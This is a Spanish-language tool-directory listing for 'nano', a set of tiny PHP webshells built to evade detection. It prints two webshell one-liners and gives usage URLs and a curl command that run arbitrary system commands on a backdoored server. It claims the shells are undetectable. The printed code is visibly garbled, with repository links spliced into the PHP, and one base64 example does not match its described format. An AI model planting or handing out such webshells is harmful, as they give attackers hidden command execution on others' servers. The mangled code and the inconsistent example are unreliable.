Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/s0md3v/nano
Generación de PayloadsShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubs0md3v/nano

nano

Nano es una familia de webshells PHP optimizadas mediante code golf para pasar desapercibidas.

Ver Repositorio
44991hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

nano

Nano es una familia de webshells PHP optimizadas mediante code golf para ser extremadamente sigilosas y eficientes.
Ponlo en watch quizás, seguiré subiendo más webshells aquí.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Características

  • 35 bytes de tamaño
  • No puede ser detectado por escáneres de código estático
  • Soporta autenticación

Uso

http://example.com/nano.php?f=function&c=command&p=password

f es para la función
c es para el comando
p es para la contraseña

Por ejemplo, el siguiente código ejecutará el comando ls:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Características

  • 93 bytes de tamaño
  • Totalmente indetectable

Uso

Este es un poco complejo.
Digamos que quieres ejecutar system(ls), entonces escríbelo como system~ls y luego codifícalo en base64, es decir, c3lzdGVtKGxzKQ==
Ahora añade cualquier 1 carácter al inicio. Digamos 'x', así que será xc3lzdGVtKGxzKQ==
Ahora abre tu terminal y escribe el siguiente comando
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
¿Demasiado trabajo? Puedes usar el handler en su lugar.

handler

Todo lo demás

Esta es mi primera cosa en php, así que si hay una manera de hacer lo que hice de una forma mejor, por favor házmelo saber o abre un pull request.
El proyecto nano está licenciado bajo la licencia MIT, lo que básicamente significa que tienes que darme crédito si quieres redistribuirlo o modificarlo.

Descargar herramienta